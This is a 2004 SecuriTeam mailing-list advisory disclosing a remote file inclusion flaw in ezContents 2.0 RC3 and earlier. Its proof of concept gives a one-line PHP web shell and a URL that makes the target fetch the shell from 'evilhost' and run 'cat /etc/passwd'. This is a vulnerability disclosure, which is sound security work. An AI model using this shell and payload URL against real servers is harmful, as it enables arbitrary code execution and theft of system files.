[UNIX] Remote Code Execution in ezContents

From: SecuriTeam (support_at_securiteam.com)
Date: 01/13/04

  • Next message: SecuriTeam: "[NEWS] Vulnerability Issues in Implementations of the H.323 Protocol (Generic)"
    To: list@securiteam.com
    Date: 13 Jan 2004 19:27:10 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Remote Code Execution in ezContents
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.ezcontents.org/> ezContents is "an Open-Source website
    content management system based on PHP and MySQL. Features include
    maintaining menus and sub-menus, adding authors that write contents,
    permissions, workflow, and layout possibilities for the entire look of the
    site by simple use of settings".

    The product has been found to contain a vulnerability that would allow a
    remote attacker to cause the PHP script to include an external PHP file
    and execute its content. This would allow an attacker to cause the server
    to execute arbitrary code.

    DETAILS

    Vulnerable systems:
     * ezContents version 2.0 RC3 and prior

    Example:
    Create the following file on your webserver:
    ----index.php----
    <?
    system($cmd);
    ?>
    -----------------

    Then type in the following URL:
    http://targethost/module.php?link=http://evilhost/index.php&cmd=cat
    /etc/passwd

    This will cause the targethost server to download the index.php file from
    the host evilhost and execute system("cat /etc/passwd").

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:zero-x@linuxmail.org> Zero_X
    www.lobnan.de Team.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Vulnerability Issues in Implementations of the H.323 Protocol (Generic)"

    Relevant Pages